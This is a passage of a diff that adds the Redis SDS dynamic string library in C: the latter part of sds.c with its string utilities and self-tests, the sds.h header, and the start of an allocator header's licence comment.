+                memcpy(s+i,str,l);
+                sdsinclen(s,l);
+                i += l;
+                break;
+            case 'i':
+            case 'I':
+                if (next == 'i')
+                    num = va_arg(ap,int);
+                else
+                    num = va_arg(ap,long long);
+                {
+                    char buf[SDS_LLSTR_SIZE];
+                    l = sdsll2str(buf,num);
+                    if (sdsavail(s) < l) {
+                        s = sdsMakeRoomFor(s,l);
+                    }
+                    memcpy(s+i,buf,l);
+                    sdsinclen(s,l);
+                    i += l;
+                }
+                break;
+            case 'u':
+            case 'U':
+                if (next == 'u')
+                    unum = va_arg(ap,unsigned int);
+                else
+                    unum = va_arg(ap,unsigned long long);
+                {
+                    char buf[SDS_LLSTR_SIZE];
+                    l = sdsull2str(buf,unum);
+                    if (sdsavail(s) < l) {
+                        s = sdsMakeRoomFor(s,l);
+                    }
+                    memcpy(s+i,buf,l);
+                    sdsinclen(s,l);
+                    i += l;
+                }
+                break;
+            default: /* Handle %% and generally %<unknown>. */
+                s[i++] = next;
+                sdsinclen(s,1);
+                break;
+            }
+            break;
+        default:
+            s[i++] = *f;
+            sdsinclen(s,1);
+            break;
+        }
+        f++;
+    }
+    va_end(ap);
+
+    /* Add null-term */
+    s[i] = '\0';
+    return s;
+}
+
+/* Remove the part of the string from left and from right composed just of
+ * contiguous characters found in 'cset', that is a null terminted C string.
+ *
+ * After the call, the modified sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call.
+ *
+ * Example:
+ *
+ * s = sdsnew("AA...AA.a.aa.aHelloWorld     :::");
+ * s = sdstrim(s,"Aa. :");
+ * printf("%s\n", s);
+ *
+ * Output will be just "Hello World".
+ */
+sds sdstrim(sds s, const char *cset) {
+    char *start, *end, *sp, *ep;
+    size_t len;
+
+    sp = start = s;
+    ep = end = s+sdslen(s)-1;
+    while(sp <= end && strchr(cset, *sp)) sp++;
+    while(ep > sp && strchr(cset, *ep)) ep--;
+    len = (sp > ep) ? 0 : ((ep-sp)+1);
+    if (s != sp) memmove(s, sp, len);
+    s[len] = '\0';
+    sdssetlen(s,len);
+    return s;
+}
+
+/* Turn the string into a smaller (or equal) string containing only the
+ * substring specified by the 'start' and 'end' indexes.
+ *
+ * start and end can be negative, where -1 means the last character of the
+ * string, -2 the penultimate character, and so forth.
+ *
+ * The interval is inclusive, so the start and end characters will be part
+ * of the resulting string.
+ *
+ * The string is modified in-place.
+ *
+ * Example:
+ *
+ * s = sdsnew("Hello World");
+ * sdsrange(s,1,-1); => "ello World"
+ */
+void sdsrange(sds s, int start, int end) {
+    size_t newlen, len = sdslen(s);
+
+    if (len == 0) return;
+    if (start < 0) {
+        start = len+start;
+        if (start < 0) start = 0;
+    }
+    if (end < 0) {
+        end = len+end;
+        if (end < 0) end = 0;
+    }
+    newlen = (start > end) ? 0 : (end-start)+1;
+    if (newlen != 0) {
+        if (start >= (signed)len) {
+            newlen = 0;
+        } else if (end >= (signed)len) {
+            end = len-1;
+            newlen = (start > end) ? 0 : (end-start)+1;
+        }
+    } else {
+        start = 0;
+    }
+    if (start && newlen) memmove(s, s+start, newlen);
+    s[newlen] = 0;
+    sdssetlen(s,newlen);
+}
+
+/* Apply tolower() to every character of the sds string 's'. */
+void sdstolower(sds s) {
+    int len = sdslen(s), j;
+
+    for (j = 0; j < len; j++) s[j] = tolower(s[j]);
+}
+
+/* Apply toupper() to every character of the sds string 's'. */
+void sdstoupper(sds s) {
+    int len = sdslen(s), j;
+
+    for (j = 0; j < len; j++) s[j] = toupper(s[j]);
+}
+
+/* Compare two sds strings s1 and s2 with memcmp().
+ *
+ * Return value:
+ *
+ *     positive if s1 > s2.
+ *     negative if s1 < s2.
+ *     0 if s1 and s2 are exactly the same binary string.
+ *
+ * If two strings share exactly the same prefix, but one of the two has
+ * additional characters, the longer string is considered to be greater than
+ * the smaller one. */
+int sdscmp(const sds s1, const sds s2) {
+    size_t l1, l2, minlen;
+    int cmp;
+
+    l1 = sdslen(s1);
+    l2 = sdslen(s2);
+    minlen = (l1 < l2) ? l1 : l2;
+    cmp = memcmp(s1,s2,minlen);
+    if (cmp == 0) return l1-l2;
+    return cmp;
+}
+
+/* Split 's' with separator in 'sep'. An array
+ * of sds strings is returned. *count will be set
+ * by reference to the number of tokens returned.
+ *
+ * On out of memory, zero length string, zero length
+ * separator, NULL is returned.
+ *
+ * Note that 'sep' is able to split a string using
+ * a multi-character separator. For example
+ * sdssplit("foo_-_bar","_-_"); will return two
+ * elements "foo" and "bar".
+ *
+ * This version of the function is binary-safe but
+ * requires length arguments. sdssplit() is just the
+ * same function but for zero-terminated strings.
+ */
+sds *sdssplitlen(const char *s, int len, const char *sep, int seplen, int *count) {
+    int elements = 0, slots = 5, start = 0, j;
+    sds *tokens;
+
+    if (seplen < 1 || len < 0) return NULL;
+
+    tokens = s_malloc(sizeof(sds)*slots);
+    if (tokens == NULL) return NULL;
+
+    if (len == 0) {
+        *count = 0;
+        return tokens;
+    }
+    for (j = 0; j < (len-(seplen-1)); j++) {
+        /* make sure there is room for the next element and the final one */
+        if (slots < elements+2) {
+            sds *newtokens;
+
+            slots *= 2;
+            newtokens = s_realloc(tokens,sizeof(sds)*slots);
+            if (newtokens == NULL) goto cleanup;
+            tokens = newtokens;
+        }
+        /* search the separator */
+        if ((seplen == 1 && *(s+j) == sep[0]) || (memcmp(s+j,sep,seplen) == 0)) {
+            tokens[elements] = sdsnewlen(s+start,j-start);
+            if (tokens[elements] == NULL) goto cleanup;
+            elements++;
+            start = j+seplen;
+            j = j+seplen-1; /* skip the separator */
+        }
+    }
+    /* Add the final element. We are sure there is room in the tokens array. */
+    tokens[elements] = sdsnewlen(s+start,len-start);
+    if (tokens[elements] == NULL) goto cleanup;
+    elements++;
+    *count = elements;
+    return tokens;
+
+cleanup:
+    {
+        int i;
+        for (i = 0; i < elements; i++) sdsfree(tokens[i]);
+        s_free(tokens);
+        *count = 0;
+        return NULL;
+    }
+}
+
+/* Free the result returned by sdssplitlen(), or do nothing if 'tokens' is NULL. */
+void sdsfreesplitres(sds *tokens, int count) {
+    if (!tokens) return;
+    while(count--)
+        sdsfree(tokens[count]);
+    s_free(tokens);
+}
+
+/* Append to the sds string "s" an escaped string representation where
+ * all the non-printable characters (tested with isprint()) are turned into
+ * escapes in the form "\n\r\a...." or "\x<hex-number>".
+ *
+ * After the call, the modified sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdscatrepr(sds s, const char *p, size_t len) {
+    s = sdscatlen(s,"\"",1);
+    while(len--) {
+        switch(*p) {
+        case '\\':
+        case '"':
+            s = sdscatprintf(s,"\\%c",*p);
+            break;
+        case '\n': s = sdscatlen(s,"\\n",2); break;
+        case '\r': s = sdscatlen(s,"\\r",2); break;
+        case '\t': s = sdscatlen(s,"\\t",2); break;
+        case '\a': s = sdscatlen(s,"\\a",2); break;
+        case '\b': s = sdscatlen(s,"\\b",2); break;
+        default:
+            if (isprint(*p))
+                s = sdscatprintf(s,"%c",*p);
+            else
+                s = sdscatprintf(s,"\\x%02x",(unsigned char)*p);
+            break;
+        }
+        p++;
+    }
+    return sdscatlen(s,"\"",1);
+}
+
+/* Helper function for sdssplitargs() that returns non zero if 'c'
+ * is a valid hex digit. */
+int is_hex_digit(char c) {
+    return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') ||
+           (c >= 'A' && c <= 'F');
+}
+
+/* Helper function for sdssplitargs() that converts a hex digit into an
+ * integer from 0 to 15 */
+int hex_digit_to_int(char c) {
+    switch(c) {
+    case '0': return 0;
+    case '1': return 1;
+    case '2': return 2;
+    case '3': return 3;
+    case '4': return 4;
+    case '5': return 5;
+    case '6': return 6;
+    case '7': return 7;
+    case '8': return 8;
+    case '9': return 9;
+    case 'a': case 'A': return 10;
+    case 'b': case 'B': return 11;
+    case 'c': case 'C': return 12;
+    case 'd': case 'D': return 13;
+    case 'e': case 'E': return 14;
+    case 'f': case 'F': return 15;
+    default: return 0;
+    }
+}
+
+/* Split a line into arguments, where every argument can be in the
+ * following programming-language REPL-alike form:
+ *
+ * foo bar "newline are supported\n" and "\xff\x00otherstuff"
+ *
+ * The number of arguments is stored into *argc, and an array
+ * of sds is returned.
+ *
+ * The caller should free the resulting array of sds strings with
+ * sdsfreesplitres().
+ *
+ * Note that sdscatrepr() is able to convert back a string into
+ * a quoted string in the same format sdssplitargs() is able to parse.
+ *
+ * The function returns the allocated tokens on success, even when the
+ * input string is empty, or NULL if the input contains unbalanced
+ * quotes or closed quotes followed by non space characters
+ * as in: "foo"bar or "foo'
+ */
+sds *sdssplitargs(const char *line, int *argc) {
+    const char *p = line;
+    char *current = NULL;
+    char **vector = NULL;
+
+    *argc = 0;
+    while(1) {
+        /* skip blanks */
+        while(*p && isspace(*p)) p++;
+        if (*p) {
+            /* get a token */
+            int inq=0;  /* set to 1 if we are in "quotes" */
+            int insq=0; /* set to 1 if we are in 'single quotes' */
+            int done=0;
+
+            if (current == NULL) current = sdsempty();
+            while(!done) {
+                if (inq) {
+                    if (*p == '\\' && *(p+1) == 'x' &&
+                                             is_hex_digit(*(p+2)) &&
+                                             is_hex_digit(*(p+3)))
+                    {
+                        unsigned char byte;
+
+                        byte = (hex_digit_to_int(*(p+2))*16)+
+                                hex_digit_to_int(*(p+3));
+                        current = sdscatlen(current,(char*)&byte,1);
+                        p += 3;
+                    } else if (*p == '\\' && *(p+1)) {
+                        char c;
+
+                        p++;
+                        switch(*p) {
+                        case 'n': c = '\n'; break;
+                        case 'r': c = '\r'; break;
+                        case 't': c = '\t'; break;
+                        case 'b': c = '\b'; break;
+                        case 'a': c = '\a'; break;
+                        default: c = *p; break;
+                        }
+                        current = sdscatlen(current,&c,1);
+                    } else if (*p == '"') {
+                        /* closing quote must be followed by a space or
+                         * nothing at all. */
+                        if (*(p+1) && !isspace(*(p+1))) goto err;
+                        done=1;
+                    } else if (!*p) {
+                        /* unterminated quotes */
+                        goto err;
+                    } else {
+                        current = sdscatlen(current,p,1);
+                    }
+                } else if (insq) {
+                    if (*p == '\\' && *(p+1) == '\'') {
+                        p++;
+                        current = sdscatlen(current,"'",1);
+                    } else if (*p == '\'') {
+                        /* closing quote must be followed by a space or
+                         * nothing at all. */
+                        if (*(p+1) && !isspace(*(p+1))) goto err;
+                        done=1;
+                    } else if (!*p) {
+                        /* unterminated quotes */
+                        goto err;
+                    } else {
+                        current = sdscatlen(current,p,1);
+                    }
+                } else {
+                    switch(*p) {
+                    case ' ':
+                    case '\n':
+                    case '\r':
+                    case '\t':
+                    case '\0':
+                        done=1;
+                        break;
+                    case '"':
+                        inq=1;
+                        break;
+                    case '\'':
+                        insq=1;
+                        break;
+                    default:
+                        current = sdscatlen(current,p,1);
+                        break;
+                    }
+                }
+                if (*p) p++;
+            }
+            /* add the token to the vector */
+            vector = s_realloc(vector,((*argc)+1)*sizeof(char*));
+            vector[*argc] = current;
+            (*argc)++;
+            current = NULL;
+        } else {
+            /* Even on empty input string return something not NULL. */
+            if (vector == NULL) vector = s_malloc(sizeof(void*));
+            return vector;
+        }
+    }
+
+err:
+    while((*argc)--)
+        sdsfree(vector[*argc]);
+    s_free(vector);
+    if (current) sdsfree(current);
+    *argc = 0;
+    return NULL;
+}
+
+/* Modify the string substituting all the occurrences of the set of
+ * characters specified in the 'from' string to the corresponding character
+ * in the 'to' array.
+ *
+ * For instance: sdsmapchars(mystring, "ho", "01", 2)
+ * will have the effect of turning the string "hello" into "0ell1".
+ *
+ * The function returns the sds string pointer, that is always the same
+ * as the input pointer since no resize is needed. */
+sds sdsmapchars(sds s, const char *from, const char *to, size_t setlen) {
+    size_t j, i, l = sdslen(s);
+
+    for (j = 0; j < l; j++) {
+        for (i = 0; i < setlen; i++) {
+            if (s[j] == from[i]) {
+                s[j] = to[i];
+                break;
+            }
+        }
+    }
+    return s;
+}
+
+/* Join an array of C strings using the specified separator (also a C string).
+ * Returns the result as an sds string. */
+sds sdsjoin(char **argv, int argc, char *sep) {
+    sds join = sdsempty();
+    int j;
+
+    for (j = 0; j < argc; j++) {
+        join = sdscat(join, argv[j]);
+        if (j != argc-1) join = sdscat(join,sep);
+    }
+    return join;
+}
+
+/* Like sdsjoin, but joins an array of SDS strings. */
+sds sdsjoinsds(sds *argv, int argc, const char *sep, size_t seplen) {
+    sds join = sdsempty();
+    int j;
+
+    for (j = 0; j < argc; j++) {
+        join = sdscatsds(join, argv[j]);
+        if (j != argc-1) join = sdscatlen(join,sep,seplen);
+    }
+    return join;
+}
+
+/* Wrappers to the allocators used by SDS. Note that SDS will actually
+ * just use the macros defined into sdsalloc.h in order to avoid to pay
+ * the overhead of function calls. Here we define these wrappers only for
+ * the programs SDS is linked to, if they want to touch the SDS internals
+ * even if they use a different allocator. */
+void *sds_malloc(size_t size) { return s_malloc(size); }
+void *sds_realloc(void *ptr, size_t size) { return s_realloc(ptr,size); }
+void sds_free(void *ptr) { s_free(ptr); }
+
+#if defined(SDS_TEST_MAIN)
+#include <stdio.h>
+#include "testhelp.h"
+#include "limits.h"
+
+#define UNUSED(x) (void)(x)
+int sdsTest(void) {
+    {
+        sds x = sdsnew("foo"), y;
+
+        test_cond("Create a string and obtain the length",
+            sdslen(x) == 3 && memcmp(x,"foo\0",4) == 0)
+
+        sdsfree(x);
+        x = sdsnewlen("foo",2);
+        test_cond("Create a string with specified length",
+            sdslen(x) == 2 && memcmp(x,"fo\0",3) == 0)
+
+        x = sdscat(x,"bar");
+        test_cond("Strings concatenation",
+            sdslen(x) == 5 && memcmp(x,"fobar\0",6) == 0);
+
+        x = sdscpy(x,"a");
+        test_cond("sdscpy() against an originally longer string",
+            sdslen(x) == 1 && memcmp(x,"a\0",2) == 0)
+
+        x = sdscpy(x,"xyzxxxxxxxxxxyyyyyyyyyykkkkkkkkkk");
+        test_cond("sdscpy() against an originally shorter string",
+            sdslen(x) == 33 &&
+            memcmp(x,"xyzxxxxxxxxxxyyyyyyyyyykkkkkkkkkk\0",33) == 0)
+
+        sdsfree(x);
+        x = sdscatprintf(sdsempty(),"%d",123);
+        test_cond("sdscatprintf() seems working in the base case",
+            sdslen(x) == 3 && memcmp(x,"123\0",4) == 0)
+
+        sdsfree(x);
+        x = sdsnew("--");
+        x = sdscatfmt(x, "Hello %s World %I,%I--", "Hi!", LLONG_MIN,LLONG_MAX);
+        test_cond("sdscatfmt() seems working in the base case",
+            sdslen(x) == 60 &&
+            memcmp(x,"--Hello Hi! World -9223372036854775808,"
+                     "9223372036854775807--",60) == 0)
+        printf("[%s]\n",x);
+
+        sdsfree(x);
+        x = sdsnew("--");
+        x = sdscatfmt(x, "%u,%U--", UINT_MAX, ULLONG_MAX);
+        test_cond("sdscatfmt() seems working with unsigned numbers",
+            sdslen(x) == 35 &&
+            memcmp(x,"--4294967295,18446744073709551615--",35) == 0)
+
+        sdsfree(x);
+        x = sdsnew(" x ");
+        sdstrim(x," x");
+        test_cond("sdstrim() works when all chars match",
+            sdslen(x) == 0)
+
+        sdsfree(x);
+        x = sdsnew(" x ");
+        sdstrim(x," ");
+        test_cond("sdstrim() works when a single char remains",
+            sdslen(x) == 1 && x[0] == 'x')
+
+        sdsfree(x);
+        x = sdsnew("xxciaoyyy");
+        sdstrim(x,"xy");
+        test_cond("sdstrim() correctly trims characters",
+            sdslen(x) == 4 && memcmp(x,"ciao\0",5) == 0)
+
+        y = sdsdup(x);
+        sdsrange(y,1,1);
+        test_cond("sdsrange(...,1,1)",
+            sdslen(y) == 1 && memcmp(y,"i\0",2) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,1,-1);
+        test_cond("sdsrange(...,1,-1)",
+            sdslen(y) == 3 && memcmp(y,"iao\0",4) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,-2,-1);
+        test_cond("sdsrange(...,-2,-1)",
+            sdslen(y) == 2 && memcmp(y,"ao\0",3) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,2,1);
+        test_cond("sdsrange(...,2,1)",
+            sdslen(y) == 0 && memcmp(y,"\0",1) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,1,100);
+        test_cond("sdsrange(...,1,100)",
+            sdslen(y) == 3 && memcmp(y,"iao\0",4) == 0)
+
+        sdsfree(y);
+        y = sdsdup(x);
+        sdsrange(y,100,100);
+        test_cond("sdsrange(...,100,100)",
+            sdslen(y) == 0 && memcmp(y,"\0",1) == 0)
+
+        sdsfree(y);
+        sdsfree(x);
+        x = sdsnew("foo");
+        y = sdsnew("foa");
+        test_cond("sdscmp(foo,foa)", sdscmp(x,y) > 0)
+
+        sdsfree(y);
+        sdsfree(x);
+        x = sdsnew("bar");
+        y = sdsnew("bar");
+        test_cond("sdscmp(bar,bar)", sdscmp(x,y) == 0)
+
+        sdsfree(y);
+        sdsfree(x);
+        x = sdsnew("aar");
+        y = sdsnew("bar");
+        test_cond("sdscmp(bar,bar)", sdscmp(x,y) < 0)
+
+        sdsfree(y);
+        sdsfree(x);
+        x = sdsnewlen("\a\n\0foo\r",7);
+        y = sdscatrepr(sdsempty(),x,sdslen(x));
+        test_cond("sdscatrepr(...data...)",
+            memcmp(y,"\"\\a\\n\\x00foo\\r\"",15) == 0)
+
+        {
+            unsigned int oldfree;
+            char *p;
+            int step = 10, j, i;
+
+            sdsfree(x);
+            sdsfree(y);
+            x = sdsnew("0");
+            test_cond("sdsnew() free/len buffers", sdslen(x) == 1 && sdsavail(x) == 0);
+
+            /* Run the test a few times in order to hit the first two
+             * SDS header types. */
+            for (i = 0; i < 10; i++) {
+                int oldlen = sdslen(x);
+                x = sdsMakeRoomFor(x,step);
+                int type = x[-1]&SDS_TYPE_MASK;
+
+                test_cond("sdsMakeRoomFor() len", sdslen(x) == oldlen);
+                if (type != SDS_TYPE_5) {
+                    test_cond("sdsMakeRoomFor() free", sdsavail(x) >= step);
+                    oldfree = sdsavail(x);
+                }
+                p = x+oldlen;
+                for (j = 0; j < step; j++) {
+                    p[j] = 'A'+j;
+                }
+                sdsIncrLen(x,step);
+            }
+            test_cond("sdsMakeRoomFor() content",
+                memcmp("0ABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJ",x,101) == 0);
+            test_cond("sdsMakeRoomFor() final length",sdslen(x)==101);
+
+            sdsfree(x);
+        }
+    }
+    test_report()
+    return 0;
+}
+#endif
+
+#ifdef SDS_TEST_MAIN
+int main(void) {
+    return sdsTest();
+}
+#endif
@@ -0,0 +1,273 @@
+/* SDSLib 2.0 -- A C dynamic strings library
+ *
+ * Copyright (c) 2006-2015, Salvatore Sanfilippo <antirez at gmail dot com>
+ * Copyright (c) 2015, Oran Agra
+ * Copyright (c) 2015, Redis Labs, Inc
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions are met:
+ *
+ *   * Redistributions of source code must retain the above copyright notice,
+ *     this list of conditions and the following disclaimer.
+ *   * Redistributions in binary form must reproduce the above copyright
+ *     notice, this list of conditions and the following disclaimer in the
+ *     documentation and/or other materials provided with the distribution.
+ *   * Neither the name of Redis nor the names of its contributors may be used
+ *     to endorse or promote products derived from this software without
+ *     specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+ * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+ * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+ * POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#ifndef __SDS_H
+#define __SDS_H
+
+#define SDS_MAX_PREALLOC (1024*1024)
+
+#include <sys/types.h>
+#include <stdarg.h>
+#include <stdint.h>
+
+typedef char *sds;
+
+/* Note: sdshdr5 is never used, we just access the flags byte directly.
+ * However is here to document the layout of type 5 SDS strings. */
+struct __attribute__ ((__packed__)) sdshdr5 {
+    unsigned char flags; /* 3 lsb of type, and 5 msb of string length */
+    char buf[];
+};
+struct __attribute__ ((__packed__)) sdshdr8 {
+    uint8_t len; /* used */
+    uint8_t alloc; /* excluding the header and null terminator */
+    unsigned char flags; /* 3 lsb of type, 5 unused bits */
+    char buf[];
+};
+struct __attribute__ ((__packed__)) sdshdr16 {
+    uint16_t len; /* used */
+    uint16_t alloc; /* excluding the header and null terminator */
+    unsigned char flags; /* 3 lsb of type, 5 unused bits */
+    char buf[];
+};
+struct __attribute__ ((__packed__)) sdshdr32 {
+    uint32_t len; /* used */
+    uint32_t alloc; /* excluding the header and null terminator */
+    unsigned char flags; /* 3 lsb of type, 5 unused bits */
+    char buf[];
+};
+struct __attribute__ ((__packed__)) sdshdr64 {
+    uint64_t len; /* used */
+    uint64_t alloc; /* excluding the header and null terminator */
+    unsigned char flags; /* 3 lsb of type, 5 unused bits */
+    char buf[];
+};
+
+#define SDS_TYPE_5  0
+#define SDS_TYPE_8  1
+#define SDS_TYPE_16 2
+#define SDS_TYPE_32 3
+#define SDS_TYPE_64 4
+#define SDS_TYPE_MASK 7
+#define SDS_TYPE_BITS 3
+#define SDS_HDR_VAR(T,s) struct sdshdr##T *sh = (void*)((s)-(sizeof(struct sdshdr##T)));
+#define SDS_HDR(T,s) ((struct sdshdr##T *)((s)-(sizeof(struct sdshdr##T))))
+#define SDS_TYPE_5_LEN(f) ((f)>>SDS_TYPE_BITS)
+
+static inline size_t sdslen(const sds s) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            return SDS_TYPE_5_LEN(flags);
+        case SDS_TYPE_8:
+            return SDS_HDR(8,s)->len;
+        case SDS_TYPE_16:
+            return SDS_HDR(16,s)->len;
+        case SDS_TYPE_32:
+            return SDS_HDR(32,s)->len;
+        case SDS_TYPE_64:
+            return SDS_HDR(64,s)->len;
+    }
+    return 0;
+}
+
+static inline size_t sdsavail(const sds s) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5: {
+            return 0;
+        }
+        case SDS_TYPE_8: {
+            SDS_HDR_VAR(8,s);
+            return sh->alloc - sh->len;
+        }
+        case SDS_TYPE_16: {
+            SDS_HDR_VAR(16,s);
+            return sh->alloc - sh->len;
+        }
+        case SDS_TYPE_32: {
+            SDS_HDR_VAR(32,s);
+            return sh->alloc - sh->len;
+        }
+        case SDS_TYPE_64: {
+            SDS_HDR_VAR(64,s);
+            return sh->alloc - sh->len;
+        }
+    }
+    return 0;
+}
+
+static inline void sdssetlen(sds s, size_t newlen) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            {
+                unsigned char *fp = ((unsigned char*)s)-1;
+                *fp = SDS_TYPE_5 | (newlen << SDS_TYPE_BITS);
+            }
+            break;
+        case SDS_TYPE_8:
+            SDS_HDR(8,s)->len = newlen;
+            break;
+        case SDS_TYPE_16:
+            SDS_HDR(16,s)->len = newlen;
+            break;
+        case SDS_TYPE_32:
+            SDS_HDR(32,s)->len = newlen;
+            break;
+        case SDS_TYPE_64:
+            SDS_HDR(64,s)->len = newlen;
+            break;
+    }
+}
+
+static inline void sdsinclen(sds s, size_t inc) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            {
+                unsigned char *fp = ((unsigned char*)s)-1;
+                unsigned char newlen = SDS_TYPE_5_LEN(flags)+inc;
+                *fp = SDS_TYPE_5 | (newlen << SDS_TYPE_BITS);
+            }
+            break;
+        case SDS_TYPE_8:
+            SDS_HDR(8,s)->len += inc;
+            break;
+        case SDS_TYPE_16:
+            SDS_HDR(16,s)->len += inc;
+            break;
+        case SDS_TYPE_32:
+            SDS_HDR(32,s)->len += inc;
+            break;
+        case SDS_TYPE_64:
+            SDS_HDR(64,s)->len += inc;
+            break;
+    }
+}
+
+/* sdsalloc() = sdsavail() + sdslen() */
+static inline size_t sdsalloc(const sds s) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            return SDS_TYPE_5_LEN(flags);
+        case SDS_TYPE_8:
+            return SDS_HDR(8,s)->alloc;
+        case SDS_TYPE_16:
+            return SDS_HDR(16,s)->alloc;
+        case SDS_TYPE_32:
+            return SDS_HDR(32,s)->alloc;
+        case SDS_TYPE_64:
+            return SDS_HDR(64,s)->alloc;
+    }
+    return 0;
+}
+
+static inline void sdssetalloc(sds s, size_t newlen) {
+    unsigned char flags = s[-1];
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            /* Nothing to do, this type has no total allocation info. */
+            break;
+        case SDS_TYPE_8:
+            SDS_HDR(8,s)->alloc = newlen;
+            break;
+        case SDS_TYPE_16:
+            SDS_HDR(16,s)->alloc = newlen;
+            break;
+        case SDS_TYPE_32:
+            SDS_HDR(32,s)->alloc = newlen;
+            break;
+        case SDS_TYPE_64:
+            SDS_HDR(64,s)->alloc = newlen;
+            break;
+    }
+}
+
+sds sdsnewlen(const void *init, size_t initlen);
+sds sdsnew(const char *init);
+sds sdsempty(void);
+sds sdsdup(const sds s);
+void sdsfree(sds s);
+sds sdsgrowzero(sds s, size_t len);
+sds sdscatlen(sds s, const void *t, size_t len);
+sds sdscat(sds s, const char *t);
+sds sdscatsds(sds s, const sds t);
+sds sdscpylen(sds s, const char *t, size_t len);
+sds sdscpy(sds s, const char *t);
+
+sds sdscatvprintf(sds s, const char *fmt, va_list ap);
+#ifdef __GNUC__
+sds sdscatprintf(sds s, const char *fmt, ...)
+    __attribute__((format(printf, 2, 3)));
+#else
+sds sdscatprintf(sds s, const char *fmt, ...);
+#endif
+
+sds sdscatfmt(sds s, char const *fmt, ...);
+sds sdstrim(sds s, const char *cset);
+void sdsrange(sds s, int start, int end);
+void sdsupdatelen(sds s);
+void sdsclear(sds s);
+int sdscmp(const sds s1, const sds s2);
+sds *sdssplitlen(const char *s, int len, const char *sep, int seplen, int *count);
+void sdsfreesplitres(sds *tokens, int count);
+void sdstolower(sds s);
+void sdstoupper(sds s);
+sds sdsfromlonglong(long long value);
+sds sdscatrepr(sds s, const char *p, size_t len);
+sds *sdssplitargs(const char *line, int *argc);
+sds sdsmapchars(sds s, const char *from, const char *to, size_t setlen);
+sds sdsjoin(char **argv, int argc, char *sep);
+sds sdsjoinsds(sds *argv, int argc, const char *sep, size_t seplen);
+
+/* Low level functions exposed to the user API */
+sds sdsMakeRoomFor(sds s, size_t addlen);
+void sdsIncrLen(sds s, int incr);
+sds sdsRemoveFreeSpace(sds s);
+size_t sdsAllocSize(sds s);
+void *sdsAllocPtr(sds s);
+
+/* Export the allocator used by SDS to the program using SDS.
+ * Sometimes the program SDS is linked to, may use a different set of
+ * allocators, but may want to allocate or free things that SDS will
+ * respectively free or allocate. */
+void *sds_malloc(size_t size);
+void *sds_realloc(void *ptr, size_t size);
+void sds_free(void *ptr);
+
+#ifdef REDIS_TEST
+int sdsTest(int argc, char *argv[]);
+#endif
+
+#endif
@@ -0,0 +1,47 @@
+/* SDSLib 2.0 -- A C dynamic strings library
+ *
+ * Copyright (c) 2006-2015, Salvatore Sanfilippo <antirez at gmail dot com>
+ * Copyright (c) 2015, Redis Labs, Inc
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions are met:
+ *
+ *   * Redistributions of source code must retain the above copyright notice,
+ *     this list of conditions and the following disclaimer.
+ *   * Redistributions in binary form must reproduce the above copyright
+ *     notice, this list of conditions and the following disclaimer in the
+ *     documentation and/or other materials provided with the distribution.
+ *   * Neither the name of Redis nor the names of its contributors may be used
+ *     to endorse or promote products derived from this software without
+ *     specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+ * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+ * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+ * POSSIBILITY OF SUCH DAMAGE.
+ */
+
+/* SDS allocator selection.
+ *
